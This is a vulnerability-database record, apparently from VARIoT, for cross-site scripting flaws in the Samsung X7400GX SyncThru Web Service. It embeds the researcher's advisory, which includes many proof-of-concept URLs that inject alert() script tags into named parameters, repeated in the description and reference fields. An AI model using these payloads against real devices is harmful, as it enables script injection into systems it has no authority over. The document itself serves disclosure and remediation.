http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed
Parameter frame=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter flag=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter Nfunc=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter func=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter type=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter popupid=alert("XSS");
- Solution:
Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0463",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "syncthru web service",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": "6.a6.25"
},
{
"model": "syncthru web service",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"db": "NVD",
"id": "CVE-2019-7420"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:samsung:syncthru_web_service",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:x7400gx_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rafael Pedrero",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.1
},
"cve": "CVE-2019-7420",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-7420",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158855",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2019-7420",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-7420",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-7420",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-578",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158855",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158855"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-578"
},
{
"db": "NVD",
"id": "CVE-2019-7420"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws.application/information/networkinformationView.sws\" in the tabName parameter. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7418\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n frame=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n flag=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\n\nParameter\n Nfunc=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n func=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n type=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n popupid=\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7419\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\n\n\nParameter\n ruiFw_title=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_pid=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_id=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7420\n# Category: webapps\n\n1. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n\nParameter\n tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7421\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\n\nParameter\n contextpath=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026popupid=id_Login\n\n\nParameter\n basedURL=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7420"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"db": "VULHUB",
"id": "VHN-158855"
},
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7420",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "151584",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002759",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-578",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158855",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158855"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-578"
},
{
"db": "NVD",
"id": "CVE-2019-7420"
}
]
},
"id": "VAR-201903-0463",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158855"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:08.730000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.samsung.com/"
},
{
"title": "SAMSUNG X7400GX SyncThru Web Service Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89376"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-578"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158855"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"db": "NVD",
"id": "CVE-2019-7420"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html"
},
{
"trust": 1.8,
"url": "http://www.samsung.com/support/productsupport/download/index.aspx"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2019/feb/28"
},
{
"trust": 1.7,
"url": "http://www.samsungprinter.com/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7420"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7420"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7421"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_pid=maintenance\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=maintenance\u0026ruifw_title=%3cscript%3ealert(xss);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7418"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7419"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e\u0026popupid=id_login"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://www.samsungprinter.com/,"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026flag=\u0026frame=\u0026msg=the%20requested%20report(s)%20will%20be%20printed"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158855"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-578"
},
{
"db": "NVD",
"id": "CVE-2019-7420"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158855"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-578"
},
{
"db": "NVD",
"id": "CVE-2019-7420"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158855"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"date": "2019-02-08T02:22:22",
"db": "PACKETSTORM",
"id": "151584"
},
{
"date": "2019-02-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-578"
},
{
"date": "2019-03-21T16:01:12.970000",
"db": "NVD",
"id": "CVE-2019-7420"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-158855"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002759"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-578"
},
{
"date": "2024-11-21T04:48:11.573000",
"db": "NVD",
"id": "CVE-2019-7420"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-578"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002759"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-578"
}
],
"trust": 0.7
}
}
var-201903-0462
Vulnerability from variot
SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!--
Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
Date: 24-01-2019
Exploit Author: Rafael Pedrero
Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
Tested on: all
CVE : CVE-2019-7418
Category: webapps
- Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.
- Proof of Concept
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed
Parameter frame=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter flag=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter Nfunc=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter func=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter type=bob@alert(XSS).XSSproxy.org
